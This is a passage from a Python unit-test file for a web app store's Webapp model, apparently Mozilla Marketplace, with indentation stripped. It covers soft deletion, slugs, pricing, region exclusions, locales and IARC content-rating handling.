eq_(len(mail.outbox), 0)
w.delete(msg='bye', reason=reason)
eq_(len(mail.outbox), 1)
assert reason in mail.outbox[0].body
def test_soft_deleted(self):
w = Webapp.objects.create(slug='ballin', app_slug='app-ballin',
app_domain='http://omg.org/yes',
status=amo.STATUS_PENDING)
eq_(len(Webapp.objects.all()), 1)
eq_(len(Webapp.with_deleted.all()), 1)
w.delete('boom shakalakalaka')
eq_(len(Webapp.objects.all()), 0)
eq_(len(Webapp.with_deleted.all()), 1)
# When an app is deleted its slugs and domain should get relinquished.
post_mortem = Webapp.with_deleted.filter(id=w.id)
eq_(post_mortem.count(), 1)
for attr in ('slug', 'app_slug', 'app_domain'):
eq_(getattr(post_mortem[0], attr), None)
def test_with_deleted_count(self):
w = Webapp.objects.create(slug='ballin', app_slug='app-ballin',
app_domain='http://omg.org/yes',
status=amo.STATUS_PENDING)
w.delete()
eq_(Webapp.with_deleted.count(), 1)
def test_soft_deleted_valid(self):
w = Webapp.objects.create(status=amo.STATUS_PUBLIC)
Webapp.objects.create(status=amo.STATUS_DELETED)
eq_(list(Webapp.objects.valid()), [w])
eq_(sorted(Webapp.with_deleted.valid()), [w])
def test_delete_incomplete_with_deleted_version(self):
"""Test deleting incomplete add-ons with no public version attached."""
app = app_factory()
app.current_version.delete()
eq_(Version.objects.count(), 0)
eq_(Version.with_deleted.count(), 1)
app.update(status=0, highest_status=0)
# We want to be in the worst possible situation, no direct foreign key
# to the deleted versions, do we call update_version() now that we have
# an incomplete app.
app.update_version()
eq_(app.latest_version, None)
eq_(app.current_version, None)
app.delete()
# The app should have been soft-deleted.
eq_(len(mail.outbox), 1)
eq_(Webapp.objects.count(), 0)
eq_(Webapp.with_deleted.count(), 1)
def test_webapp_type(self):
webapp = Webapp()
webapp.save()
eq_(webapp.type, amo.ADDON_WEBAPP)
def test_app_slugs_separate_from_addon_slugs(self):
Addon.objects.create(type=1, slug='slug')
webapp = Webapp(app_slug='slug')
webapp.save()
eq_(webapp.slug, 'app-%s' % webapp.id)
eq_(webapp.app_slug, 'slug')
def test_app_slug_collision(self):
Webapp(app_slug='slug').save()
w2 = Webapp(app_slug='slug')
w2.save()
eq_(w2.app_slug, 'slug-1')
w3 = Webapp(app_slug='slug')
w3.save()
eq_(w3.app_slug, 'slug-2')
def test_app_slug_blocklist(self):
BlacklistedSlug.objects.create(name='slug')
w = Webapp(app_slug='slug')
w.save()
eq_(w.app_slug, 'slug~')
def test_geodata_upon_app_creation(self):
app = Webapp.objects.create(type=amo.ADDON_WEBAPP)
assert app.geodata, (
'Geodata was not created with Webapp.')
def test_get_url_path(self):
webapp = Webapp(app_slug='woo')
eq_(webapp.get_url_path(), '/app/woo/')
def test_get_api_url(self):
webapp = Webapp(app_slug='woo', pk=1)
self.assertApiUrlEqual(webapp.get_api_url(), '/apps/app/woo/')
def test_get_api_url_pk(self):
webapp = Webapp(pk=1)
self.assertApiUrlEqual(webapp.get_api_url(pk=True), '/apps/app/1/')
def test_get_stats_url(self):
webapp = Webapp(app_slug='woo')
eq_(webapp.get_stats_url(), '/statistics/app/woo')
def test_get_comm_thread_url(self):
self.create_switch('comm-dashboard')
app = app_factory(app_slug='putain')
eq_(app.get_comm_thread_url(), '/comm/app/putain')
def test_get_origin(self):
url = 'http://www.xx.com:4000/randompath/manifest.webapp'
webapp = Webapp(manifest_url=url)
eq_(webapp.origin, 'http://www.xx.com:4000')
def test_get_packaged_origin(self):
webapp = Webapp(app_domain='app://foo.com', is_packaged=True,
manifest_url='')
eq_(webapp.origin, 'app://foo.com')
def test_punicode_domain(self):
webapp = Webapp(app_domain=u'http://www.allizôm.org')
eq_(webapp.punycode_app_domain, 'http://www.xn--allizm-mxa.org')
def test_reviewed(self):
assert not Webapp().is_unreviewed()
def test_cannot_be_purchased(self):
eq_(Webapp(premium_type=True).can_be_purchased(), False)
eq_(Webapp(premium_type=False).can_be_purchased(), False)
def test_can_be_purchased(self):
w = Webapp(status=amo.STATUS_PUBLIC, premium_type=True)
eq_(w.can_be_purchased(), True)
w = Webapp(status=amo.STATUS_PUBLIC, premium_type=False)
eq_(w.can_be_purchased(), False)
def test_get_previews(self):
w = Webapp.objects.create()
eq_(w.get_promo(), None)
p = Preview.objects.create(addon=w, position=0)
eq_(list(w.get_previews()), [p])
p.update(position=-1)
eq_(list(w.get_previews()), [])
def test_get_promo(self):
w = Webapp.objects.create()
eq_(w.get_promo(), None)
p = Preview.objects.create(addon=w, position=0)
eq_(w.get_promo(), None)
p.update(position=-1)
eq_(w.get_promo(), p)
def test_mark_done_pending(self):
w = Webapp()
eq_(w.status, amo.STATUS_NULL)
w.mark_done()
eq_(w.status, amo.WEBAPPS_UNREVIEWED_STATUS)
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_no_icon_in_manifest(self, get_manifest_json):
webapp = Webapp()
get_manifest_json.return_value = {}
eq_(webapp.has_icon_in_manifest(), False)
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_has_icon_in_manifest(self, get_manifest_json):
webapp = Webapp()
get_manifest_json.return_value = {'icons': {}}
eq_(webapp.has_icon_in_manifest(), True)
def test_no_version(self):
webapp = Webapp()
eq_(webapp.get_manifest_json(), None)
eq_(webapp.current_version, None)
def test_has_premium(self):
webapp = Webapp(premium_type=amo.ADDON_PREMIUM)
webapp._premium = mock.Mock()
webapp._premium.price = 1
eq_(webapp.has_premium(), True)
webapp._premium.price = 0
eq_(webapp.has_premium(), True)
def test_get_price_no_premium(self):
webapp = Webapp(premium_type=amo.ADDON_PREMIUM)
eq_(webapp.get_price(), None)
eq_(webapp.get_price_locale(), None)
def test_get_price(self):
webapp = amo.tests.app_factory()
self.make_premium(webapp)
eq_(webapp.get_price(region=mkt.regions.US.id), 1)
def test_get_price_tier(self):
webapp = amo.tests.app_factory()
self.make_premium(webapp)
eq_(str(webapp.get_tier().price), '1.00')
ok_(webapp.get_tier_name())
def test_get_price_tier_no_charge(self):
webapp = amo.tests.app_factory()
self.make_premium(webapp, 0)
eq_(str(webapp.get_tier().price), '0')
ok_(webapp.get_tier_name())
def test_has_no_premium(self):
webapp = Webapp(premium_type=amo.ADDON_PREMIUM)
webapp._premium = None
eq_(webapp.has_premium(), False)
def test_not_premium(self):
eq_(Webapp().has_premium(), False)
def test_get_region_ids_no_exclusions(self):
# This returns IDs for the *included* regions.
eq_(Webapp().get_region_ids(), mkt.regions.REGION_IDS)
def test_get_region_ids_with_exclusions(self):
w1 = Webapp.objects.create()
w2 = Webapp.objects.create()
AddonExcludedRegion.objects.create(addon=w1, region=mkt.regions.BR.id)
AddonExcludedRegion.objects.create(addon=w1, region=mkt.regions.US.id)
AddonExcludedRegion.objects.create(addon=w2, region=mkt.regions.UK.id)
w1_regions = list(mkt.regions.REGION_IDS)
w1_regions.remove(mkt.regions.BR.id)
w1_regions.remove(mkt.regions.US.id)
w2_regions = list(mkt.regions.REGION_IDS)
w2_regions.remove(mkt.regions.UK.id)
eq_(sorted(Webapp.objects.get(id=w1.id).get_region_ids()),
sorted(w1_regions))
eq_(sorted(Webapp.objects.get(id=w2.id).get_region_ids()),
sorted(w2_regions))
def test_get_regions_no_exclusions(self):
# This returns the class definitions for the *included* regions.
eq_(sorted(Webapp().get_regions()),
sorted(mkt.regions.REGIONS_CHOICES_ID_DICT.values()))
def test_get_regions_with_exclusions(self):
w1 = Webapp.objects.create()
w2 = Webapp.objects.create()
AddonExcludedRegion.objects.create(addon=w1, region=mkt.regions.BR.id)
AddonExcludedRegion.objects.create(addon=w1, region=mkt.regions.US.id)
AddonExcludedRegion.objects.create(addon=w2, region=mkt.regions.UK.id)
all_regions = mkt.regions.REGIONS_CHOICES_ID_DICT.values()
w1_regions = list(all_regions)
w1_regions.remove(mkt.regions.BR)
w1_regions.remove(mkt.regions.US)
w2_regions = list(all_regions)
w2_regions.remove(mkt.regions.UK)
eq_(sorted(Webapp.objects.get(id=w1.id).get_regions()),
sorted(w1_regions))
eq_(sorted(Webapp.objects.get(id=w2.id).get_regions()),
sorted(w2_regions))
def test_package_helpers(self):
app1 = app_factory()
eq_(app1.is_packaged, False)
app2 = app_factory(is_packaged=True)
eq_(app2.is_packaged, True)
def test_package_no_version(self):
webapp = Webapp.objects.create(manifest_url='http://foo.com')
eq_(webapp.is_packaged, False)
def test_assign_uuid(self):
app = Webapp()
eq_(app.guid, None)
app.save()
assert app.guid is not None, (
'Expected app to have a UUID assigned to guid')
@mock.patch.object(uuid, 'uuid4')
def test_assign_uuid_max_tries(self, mock_uuid4):
guid = 'abcdef12-abcd-abcd-abcd-abcdef123456'
mock_uuid4.return_value = uuid.UUID(guid)
# Create another webapp with and set the guid.
Webapp.objects.create(guid=guid)
# Now `assign_uuid()` should fail.
app = Webapp()
with self.assertRaises(ValueError):
app.save()
def test_is_premium_type_upgrade_check(self):
app = Webapp()
ALL = set(amo.ADDON_FREES + amo.ADDON_PREMIUMS)
free_upgrade = ALL - set([amo.ADDON_FREE])
free_inapp_upgrade = ALL - set([amo.ADDON_FREE, amo.ADDON_FREE_INAPP])
# Checking ADDON_FREE changes.
app.premium_type = amo.ADDON_FREE
for pt in ALL:
eq_(app.is_premium_type_upgrade(pt), pt in free_upgrade)
# Checking ADDON_FREE_INAPP changes.
app.premium_type = amo.ADDON_FREE_INAPP
for pt in ALL:
eq_(app.is_premium_type_upgrade(pt), pt in free_inapp_upgrade)
# All else is false.
for pt_old in ALL - set([amo.ADDON_FREE, amo.ADDON_FREE_INAPP]):
app.premium_type = pt_old
for pt_new in ALL:
eq_(app.is_premium_type_upgrade(pt_new), False)
@raises(ValueError)
def test_parse_domain(self):
Webapp(is_packaged=True).parsed_app_domain
def test_app_type_hosted(self):
eq_(Webapp().app_type, 'hosted')
def test_app_type_packaged(self):
eq_(Webapp(is_packaged=True).app_type, 'packaged')
@mock.patch('versions.models.Version.is_privileged', True)
def test_app_type_privileged(self):
# Have to use `app_factory` because we need a `latest_version`
# to make it a privileged version.
eq_(app_factory(is_packaged=True).app_type, 'privileged')
def test_nomination_new(self):
app = app_factory()
app.update(status=amo.STATUS_NULL)
app.versions.latest().update(nomination=None)
app.update(status=amo.STATUS_PENDING)
assert app.versions.latest().nomination
def test_nomination_rejected(self):
app = app_factory()
app.update(status=amo.STATUS_REJECTED)
app.versions.latest().update(nomination=self.days_ago(1))
app.update(status=amo.STATUS_PENDING)
self.assertCloseToNow(app.versions.latest().nomination)
def test_nomination_pkg_pending_new_version(self):
# New versions while pending inherit version nomination.
app = app_factory()
app.update(status=amo.STATUS_PENDING, is_packaged=True)
old_ver = app.versions.latest()
old_ver.update(nomination=self.days_ago(1))
old_ver.all_files[0].update(status=amo.STATUS_PENDING)
v = Version.objects.create(addon=app, version='1.9')
eq_(v.nomination, old_ver.nomination)
def test_nomination_pkg_public_new_version(self):
# New versions while public get a new version nomination.
app = app_factory()
app.update(is_packaged=True)
old_ver = app.versions.latest()
old_ver.update(nomination=self.days_ago(1))
v = Version.objects.create(addon=app, version='1.9')
self.assertCloseToNow(v.nomination)
def test_nomination_public_waiting(self):
# New versions while public waiting get a new version nomination.
app = app_factory()
app.update(is_packaged=True, status=amo.STATUS_PUBLIC_WAITING)
old_ver = app.versions.latest()
old_ver.update(nomination=self.days_ago(1))
old_ver.all_files[0].update(status=amo.STATUS_PUBLIC_WAITING)
v = Version.objects.create(addon=app, version='1.9')
self.assertCloseToNow(v.nomination)
def test_excluded_in(self):
app1 = app_factory()
region = mkt.regions.BR
AddonExcludedRegion.objects.create(addon=app1, region=region.id)
self.assertSetEqual(get_excluded_in(region.id), [app1.id])
def test_excluded_in_iarc(self):
app = app_factory()
geodata = app._geodata
geodata.update(region_br_iarc_exclude=True,
region_de_iarc_exclude=True)
self.assertSetEqual(get_excluded_in(mkt.regions.BR.id), [app.id])
self.assertSetEqual(get_excluded_in(mkt.regions.DE.id), [app.id])
def test_excluded_in_iarc_de(self):
app = app_factory()
geodata = app._geodata
geodata.update(region_br_iarc_exclude=False,
region_de_iarc_exclude=True)
self.assertSetEqual(get_excluded_in(mkt.regions.BR.id), [])
self.assertSetEqual(get_excluded_in(mkt.regions.DE.id), [app.id])
def test_excluded_in_usk_exclude(self):
app = app_factory()
geodata = app._geodata
geodata.update(region_de_usk_exclude=True)
self.assertSetEqual(get_excluded_in(mkt.regions.BR.id), [])
self.assertSetEqual(get_excluded_in(mkt.regions.DE.id), [app.id])
def test_supported_locale_property(self):
app = app_factory()
app.versions.latest().update(supported_locales='de,fr', _signal=False)
app.reload()
eq_(app.supported_locales,
(u'English (US)', [u'Deutsch', u'Fran\xe7ais']))
def test_supported_locale_property_empty(self):
app = app_factory()
eq_(app.supported_locales, (u'English (US)', []))
def test_supported_locale_property_bad(self):
app = app_factory()
app.versions.latest().update(supported_locales='de,xx', _signal=False)
app.reload()
eq_(app.supported_locales, (u'English (US)', [u'Deutsch']))
def test_supported_locale_app_rejected(self):
"""
Simulate an app being rejected, which sets the
app.current_version to None, and verify supported_locales works
as expected -- which is that if there is no current version we
can't report supported_locales for it, so we return an empty
list.
"""
app = app_factory()
app.versions.latest().update(supported_locales='de', _signal=False)
app.update(status=amo.STATUS_REJECTED)
app.versions.latest().all_files[0].update(status=amo.STATUS_REJECTED)
app.update_version()
app.reload()
eq_(app.supported_locales, (u'English (US)', []))
def test_get_trending(self):
# Test no trending record returns zero.
app = app_factory()
eq_(app.get_trending(), 0)
# Add a region specific trending and test the global one is returned
# because the region is not mature.
region = mkt.regions.REGIONS_DICT['me']
app.trending.create(value=20.0, region=0)
app.trending.create(value=10.0, region=region.id)
eq_(app.get_trending(region=region), 20.0)
# Now test the regional trending is returned when adolescent=False.
region.adolescent = False
eq_(app.get_trending(region=region), 10.0)
@mock.patch('mkt.webapps.models.cache.get')
def test_is_offline_when_packaged(self, mock_get):
mock_get.return_value = ''
eq_(Webapp(is_packaged=True).is_offline, True)
eq_(Webapp(is_packaged=False).is_offline, False)
def test_is_offline_when_appcache_path(self):
app = app_factory()
manifest = {'name': 'Swag'}
# If there's no appcache_path defined, ain't an offline-capable app.
am = AppManifest.objects.create(version=app.current_version,
manifest=json.dumps(manifest))
eq_(app.is_offline, False)
# If there's an appcache_path defined, this is an offline-capable app.
manifest['appcache_path'] = '/manifest.appcache'
am.update(manifest=json.dumps(manifest))
# reload isn't enough, it doesn't clear cached_property.
app = Webapp.objects.get(pk=app.pk)
eq_(app.is_offline, True)
@mock.patch('mkt.webapps.models.Webapp.completion_errors')
def test_completion_errors(self, complete_mock):
app = app_factory()
complete_mock.return_value = {
'details': ['1', '2'],
'payments': 'pc load letter'
}
eq_(app.completion_error_msgs(), ['1', '2', 'pc load letter'])
assert not app.is_fully_complete()
complete_mock.return_value = {}
eq_(app.completion_error_msgs(), [])
assert app.is_fully_complete()
@mock.patch('mkt.webapps.models.Webapp.payments_complete')
@mock.patch('mkt.webapps.models.Webapp.content_ratings_complete')
@mock.patch('mkt.webapps.models.Webapp.details_complete')
def test_next_step(self, detail_step, rating_step, pay_step):
self.create_switch('iarc')
for step in (detail_step, rating_step, pay_step):
step.return_value = False
app = app_factory(status=amo.STATUS_NULL)
self.make_premium(app)
eq_(app.next_step()['url'], app.get_dev_url())
detail_step.return_value = True
eq_(app.next_step()['url'], app.get_dev_url('ratings'))
rating_step.return_value = True
eq_(app.next_step()['url'], app.get_dev_url('payments'))
pay_step.return_value = True
assert not app.next_step()
def test_meta_translated_fields(self):
"""Test that we don't load translations for all the translated fields
that live on Addon but we don't need in Webapp."""
useless_fields = ('eula', 'thankyou_note', 'summary',
'developer_comments', 'the_future', 'the_reason')
useful_fields = ('homepage', 'privacy_policy', 'name', 'description',
'support_email', 'support_url')
self.assertSetEqual(Addon._meta.translated_fields,
[Addon._meta.get_field(f) for f in useless_fields + useful_fields])
self.assertSetEqual(Webapp._meta.translated_fields,
[Webapp._meta.get_field(f) for f in useful_fields])
# Build fake data with all fields, and use it to create an app.
data = dict(zip(useless_fields + useful_fields,
useless_fields + useful_fields))
app = app_factory(**data)
for field_name in useless_fields + useful_fields:
field_id_name = app._meta.get_field(field_name).attname
ok_(getattr(app, field_name, None))
ok_(getattr(app, field_id_name, None))
# Reload the app, the useless fields should all have ids but the value
# shouldn't have been loaded.
app = Webapp.objects.get(pk=app.pk)
for field_name in useless_fields:
field_id_name = app._meta.get_field(field_name).attname
ok_(getattr(app, field_name, None) is None)
ok_(getattr(app, field_id_name, None))
# The useful fields should all be ok.
for field_name in useful_fields:
field_id_name = app._meta.get_field(field_name).attname
ok_(getattr(app, field_name, None))
ok_(getattr(app, field_id_name, None))
def test_has_payment_account(self):
app = app_factory()
assert not app.has_payment_account()
self.add_payment_account(app, PROVIDER_BANGO)
assert app.has_payment_account()
def test_has_multiple_payment_accounts(self):
app = app_factory()
assert not app.has_multiple_payment_accounts(), 'no accounts'
account = self.add_payment_account(app, PROVIDER_BANGO)
assert not app.has_multiple_payment_accounts(), 'one account'
self.add_payment_account(app, PROVIDER_BOKU, user=account.user)
ok_(app.has_multiple_payment_accounts(), 'two accounts')
def test_no_payment_account(self):
app = app_factory()
assert not app.has_payment_account()
with self.assertRaises(app.PayAccountDoesNotExist):
app.payment_account(PROVIDER_BANGO)
def test_get_payment_account(self):
app = app_factory()
acct = self.add_payment_account(app, PROVIDER_BANGO)
fetched_acct = app.payment_account(PROVIDER_BANGO)
eq_(acct, fetched_acct)
@mock.patch('mkt.webapps.models.Webapp.has_payment_account')
def test_payments_complete(self, pay_mock):
# Default to complete if it's not needed.
pay_mock.return_value = False
app = app_factory()
assert app.payments_complete()
self.make_premium(app)
assert not app.payments_complete()
pay_mock.return_value = True
assert app.payments_complete()
def test_version_and_file_transformer_with_empty_query(self):
# When we process a query, don't return a list just because
# the query is empty
empty_query = Webapp.objects.filter(app_slug='mahna__mahna')
empty_result = Webapp.version_and_file_transformer(empty_query)
self.assertEqual(empty_result.count(), 0)
class TestWebappContentRatings(amo.tests.TestCase):
def test_rated(self):
self.create_switch('iarc')
assert app_factory(rated=True).is_rated()
assert not app_factory().is_rated()
@mock.patch('mkt.webapps.models.Webapp.details_complete')
@mock.patch('mkt.webapps.models.Webapp.payments_complete')
def test_set_content_ratings(self, pay_mock, detail_mock):
self.create_switch('iarc')
detail_mock.return_value = True
pay_mock.return_value = True
rb = mkt.ratingsbodies
app = app_factory(status=amo.STATUS_NULL)
app.set_content_ratings({})
assert not app.is_rated()
eq_(app.status, amo.STATUS_NULL)
# Create.
app.set_content_ratings({
rb.CLASSIND: rb.CLASSIND_L,
rb.PEGI: rb.PEGI_3,
})
eq_(ContentRating.objects.count(), 2)
for expected in [(rb.CLASSIND.id, rb.CLASSIND_L.id),
(rb.PEGI.id, rb.PEGI_3.id)]:
assert ContentRating.objects.filter(
addon=app, ratings_body=expected[0],
rating=expected[1]).exists()
eq_(app.reload().status, amo.STATUS_PENDING)
# Update.
app.set_content_ratings({
rb.CLASSIND: rb.CLASSIND_10,
rb.PEGI: rb.PEGI_3,
rb.GENERIC: rb.GENERIC_18,
})
for expected in [(rb.CLASSIND.id, rb.CLASSIND_10.id),
(rb.PEGI.id, rb.PEGI_3.id),
(rb.GENERIC.id, rb.GENERIC_18.id)]:
assert ContentRating.objects.filter(
addon=app, ratings_body=expected[0],
rating=expected[1]).exists()
eq_(app.reload().status, amo.STATUS_PENDING)
def test_app_delete_clears_iarc_data(self):
self.create_switch('iarc')
app = app_factory(rated=True)
# Ensure we have some data to start with.
ok_(IARCInfo.objects.filter(addon=app).exists())
ok_(ContentRating.objects.filter(addon=app).exists())
ok_(RatingDescriptors.objects.filter(addon=app).exists())
ok_(RatingInteractives.objects.filter(addon=app).exists())
# Delete.
app.delete()
msg = 'Related IARC data should be deleted.'
ok_(not IARCInfo.objects.filter(addon=app).exists(), msg)
ok_(not ContentRating.objects.filter(addon=app).exists(), msg)
ok_(not RatingDescriptors.objects.filter(addon=app).exists(), msg)
ok_(not RatingInteractives.objects.filter(addon=app).exists(), msg)
def test_set_content_ratings_usk_refused(self):
app = app_factory()
app.set_content_ratings({
mkt.ratingsbodies.USK: mkt.ratingsbodies.USK_REJECTED
})
ok_(Geodata.objects.get(addon=app).region_de_usk_exclude)
app.set_content_ratings({
mkt.ratingsbodies.USK: mkt.ratingsbodies.USK_12
})
ok_(not Geodata.objects.get(addon=app).region_de_usk_exclude)
def test_set_content_ratings_iarc_games_unexclude(self):
app = app_factory()
app._geodata.update(region_br_iarc_exclude=True,
region_de_iarc_exclude=True)
app.set_content_ratings({
mkt.ratingsbodies.USK: mkt.ratingsbodies.USK_12
})
geodata = Geodata.objects.get(addon=app)
ok_(not geodata.region_br_iarc_exclude)
ok_(not geodata.region_de_iarc_exclude)
def test_set_content_ratings_purge_unexclude(self):
app = app_factory()
app.update(status=amo.STATUS_DISABLED, iarc_purged=True)
app.set_content_ratings({
mkt.ratingsbodies.USK: mkt.ratingsbodies.USK_12
})
ok_(not app.reload().iarc_purged)
eq_(app.status, amo.STATUS_PUBLIC)
def test_set_descriptors(self):
app = app_factory()
eq_(RatingDescriptors.objects.count(), 0)
app.set_descriptors([])
descriptors = RatingDescriptors.objects.get(addon=app)
assert not descriptors.has_classind_drugs
assert not descriptors.has_esrb_blood # Blood-deuh!
# Create.
app.set_descriptors([
'has_classind_drugs', 'has_pegi_scary', 'has_generic_drugs'
])
descriptors = RatingDescriptors.objects.get(addon=app)
assert descriptors.has_classind_drugs
assert descriptors.has_pegi_scary
assert descriptors.has_generic_drugs
assert not descriptors.has_esrb_blood
# Update.
app.set_descriptors([
'has_esrb_blood', 'has_classind_drugs'
])
descriptors = RatingDescriptors.objects.get(addon=app)
assert descriptors.has_esrb_blood
assert descriptors.has_classind_drugs
assert not descriptors.has_pegi_scary
assert not descriptors.has_generic_drugs
def test_set_interactives(self):
app = app_factory()
app.set_interactives([])
eq_(RatingInteractives.objects.count(), 1)
app_interactives = RatingInteractives.objects.get(addon=app)
assert not app_interactives.has_shares_info
assert not app_interactives.has_digital_purchases
# Create.
app.set_interactives([
'has_shares_info', 'has_digital_PurChaSes', 'has_UWOTM8'
])
eq_(RatingInteractives.objects.count(), 1)
app_interactives = RatingInteractives.objects.get(addon=app)
assert app_interactives.has_shares_info
assert app_interactives.has_digital_purchases
assert not app_interactives.has_users_interact
# Update.
app.set_interactives([
'has_digital_purchases', 'has_shares_ur_mum'
])
eq_(RatingInteractives.objects.count(), 1)
app_interactives = RatingInteractives.objects.get(addon=app)
assert not app_interactives.has_shares_info
assert app_interactives.has_digital_purchases
@mock.patch('lib.iarc.client.MockClient.call')
@mock.patch('mkt.webapps.models.render_xml')
def test_set_iarc_storefront_data(self, render_mock, storefront_mock):
# Set up ratings/descriptors/interactives.
self.create_switch('iarc')
app = app_factory(name='LOL', app_slug='ha')
app.current_version.reviewed = datetime(2013, 1, 1, 12, 34, 56)
app.current_version._developer_name = 'Lex Luthor'
app.set_iarc_info(submission_id=1234, security_code='sektor')
app.set_descriptors(['has_esrb_blood', 'has_pegi_scary'])
app.set_interactives(['has_users_interact', 'has_shares_info'])
app.content_ratings.create(
ratings_body=mkt.ratingsbodies.ESRB.id,
rating=mkt.ratingsbodies.ESRB_A.id)
app.content_ratings.create(
ratings_body=mkt.ratingsbodies.PEGI.id,
rating=mkt.ratingsbodies.PEGI_3.id)
# Check the client was called.
app.set_iarc_storefront_data()
assert storefront_mock.called
eq_(render_mock.call_count, 2)
eq_(render_mock.call_args_list[0][0][0], 'set_storefront_data.xml')
# Check arguments to the XML template are all correct.
data = render_mock.call_args_list[0][0][1]
eq_(type(data['title']), unicode)
eq_(data['app_url'], app.get_url_path())
eq_(data['submission_id'], 1234)
eq_(data['security_code'], 'sektor')
eq_(data['rating_system'], 'ESRB')
eq_(data['release_date'], app.current_version.reviewed)
eq_(data['title'], 'LOL')
eq_(data['company'], 'Lex Luthor')
eq_(data['rating'], 'Adults Only')
eq_(data['descriptors'], 'Blood')
self.assertSetEqual(data['interactive_elements'].split(', '),
['Shares Info', 'Users Interact'])
data = render_mock.call_args_list[1][0][1]
eq_(type(data['title']), unicode)
eq_(data['submission_id'], 1234)
eq_(data['security_code'], 'sektor')
eq_(data['rating_system'], 'PEGI')
eq_(data['release_date'], app.current_version.reviewed)
eq_(data['title'], 'LOL')
eq_(data['company'], 'Lex Luthor')
eq_(data['rating'], '3+')
eq_(data['descriptors'], 'Fear')
self.assertSetEqual(data['interactive_elements'].split(', '),
['Shares Info', 'Users Interact'])
@mock.patch('lib.iarc.client.MockClient.call')
def test_set_iarc_storefront_data_not_rated_by_iarc(self, storefront_mock):
self.create_switch('iarc')
app_factory().set_iarc_storefront_data()
assert not storefront_mock.called
@mock.patch('mkt.webapps.models.Webapp.current_version', new=None)
@mock.patch('lib.iarc.client.MockClient.call')
def test_set_iarc_storefront_data_no_version(self, storefront_mock):
self.create_switch('iarc')
app = app_factory(rated=True, status=amo.STATUS_PUBLIC)
ok_(not app.current_version)
app.set_iarc_storefront_data()
assert storefront_mock.called
@mock.patch('lib.iarc.client.MockClient.call')
def test_set_iarc_storefront_data_invalid_status(self, storefront_mock):
self.create_switch('iarc')
app = app_factory()
for status in (amo.STATUS_NULL, amo.STATUS_PENDING):
app.update(status=status)
app.set_iarc_storefront_data()
assert not storefront_mock.called
@mock.patch('mkt.webapps.models.render_xml')
@mock.patch('lib.iarc.client.MockClient.call')
def test_set_iarc_storefront_data_disable(self, storefront_mock,
render_mock):
self.create_switch('iarc')
app = app_factory(name='LOL', rated=True)
app.current_version.update(_developer_name='Lex Luthor')
app.set_iarc_info(123, 'abc')
app.set_iarc_storefront_data(disable=True)
data = render_mock.call_args_list[0][0][1]
eq_(data['submission_id'], 123)
eq_(data['security_code'], 'abc')
eq_(data['title'], 'LOL')
eq_(data['release_date'], '')
# Also test that a deleted app has the correct release_date.
app.delete()
app.set_iarc_storefront_data()
data = render_mock.call_args_list[0][0][1]
eq_(data['submission_id'], 123)
eq_(data['security_code'], 'abc')
eq_(data['title'], 'LOL')
eq_(data['release_date'], '')
def test_get_descriptors_slugs(self):
app = app_factory()
eq_(app.get_descriptors_slugs(), [])
app.set_descriptors(['has_esrb_blood', 'has_pegi_scary'])
self.assertSetEqual(
app.get_descriptors_slugs(), ['ESRB_BLOOD', 'PEGI_SCARY'])
def test_get_descriptors_dehydrated(self):
app = app_factory()
eq_(app.get_descriptors_dehydrated(), {})
app.set_descriptors(['has_esrb_blood', 'has_pegi_scary'])
eq_(dict(app.get_descriptors_dehydrated()),
{'esrb': ['blood'], 'pegi': ['scary']})
def test_get_interactives_slugs(self):
app = app_factory()
eq_(app.get_interactives_slugs(), [])
app.set_interactives(['has_digital_purchases', 'has_shares_info'])
self.assertSetEqual(app.get_interactives_slugs(),
['DIGITAL_PURCHASES', 'SHARES_INFO'])
def test_get_interactives_dehydrated(self):
app = app_factory()
eq_(app.get_interactives_dehydrated(), [])
app.set_interactives(['has_digital_purchases', 'has_shares_info'])
eq_(app.get_interactives_dehydrated(), ['shares-info',
'digital-purchases'])
@override_settings(SECRET_KEY='test')
def test_iarc_token(self):
app = Webapp()
app.id = 1
eq_(app.iarc_token(),
hashlib.sha512(settings.SECRET_KEY + str(app.id)).hexdigest())
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
def test_delete_with_iarc(self, storefront_mock):
self.create_switch('iarc')
app = app_factory(rated=True)
app.delete()
eq_(app.status, amo.STATUS_DELETED)
assert storefront_mock.called
@mock.patch('mkt.webapps.models.Webapp.is_rated')
def test_content_ratings_complete(self, is_rated_mock):
# Default to complete if it's not needed.
is_rated_mock.return_value = False
app = app_factory()
assert app.content_ratings_complete()
self.create_switch('iarc', db=True)
assert not app.content_ratings_complete()
is_rated_mock.return_value = True
assert app.content_ratings_complete()
@mock.patch('mkt.webapps.models.Webapp.details_complete')
@mock.patch('mkt.webapps.models.Webapp.payments_complete')
def test_completion_errors_ignore_ratings(self, mock1, mock2):
self.create_switch('iarc')
app = app_factory()
for mock in (mock1, mock2):
mock.return_value = True
assert app.completion_errors()
assert not app.is_fully_complete()
assert 'content_ratings' not in (
app.completion_errors(ignore_ratings=True))
assert app.is_fully_complete(ignore_ratings=True)
class DeletedAppTests(amo.tests.TestCase):
def test_soft_deleted_no_current_version(self):
webapp = amo.tests.app_factory()
webapp._current_version = None
webapp.save()
webapp.delete()
eq_(webapp.current_version, None)
def test_soft_deleted_no_latest_version(self):
webapp = amo.tests.app_factory()
webapp._latest_version = None
webapp.save()
webapp.delete()
eq_(webapp.latest_version, None)
class TestExclusions(amo.tests.TestCase):
fixtures = fixture('prices')
def setUp(self):
self.app = Webapp.objects.create(premium_type=amo.ADDON_PREMIUM)
self.app.addonexcludedregion.create(region=mkt.regions.US.id)
self.geodata = self.app._geodata
def make_tier(self):
self.price = Price.objects.get(pk=1)
AddonPremium.objects.create(addon=self.app, price=self.price)
def test_not_premium(self):
ok_(mkt.regions.US.id in self.app.get_excluded_region_ids())
def test_premium(self):
self.make_tier()
ok_(mkt.regions.US.id in self.app.get_excluded_region_ids())
def test_premium_remove_tier(self):
self.make_tier()
(self.price.pricecurrency_set
.filter(region=mkt.regions.PL.id).update(paid=False))
ok_(mkt.regions.PL.id in self.app.get_excluded_region_ids())
def test_usk_rating_refused(self):
self.geodata.update(region_de_usk_exclude=True)
ok_(mkt.regions.DE.id in self.app.get_excluded_region_ids())
def test_game_iarc(self):
self.geodata.update(region_de_iarc_exclude=True,
region_br_iarc_exclude=True)
excluded = self.app.get_excluded_region_ids()
ok_(mkt.regions.BR.id in excluded)
ok_(mkt.regions.DE.id in excluded)
class TestPackagedAppManifestUpdates(amo.tests.TestCase):
# Note: More extensive tests for `Addon.update_names` are in the Addon
# model tests.
fixtures = ['base/platforms']
def setUp(self):
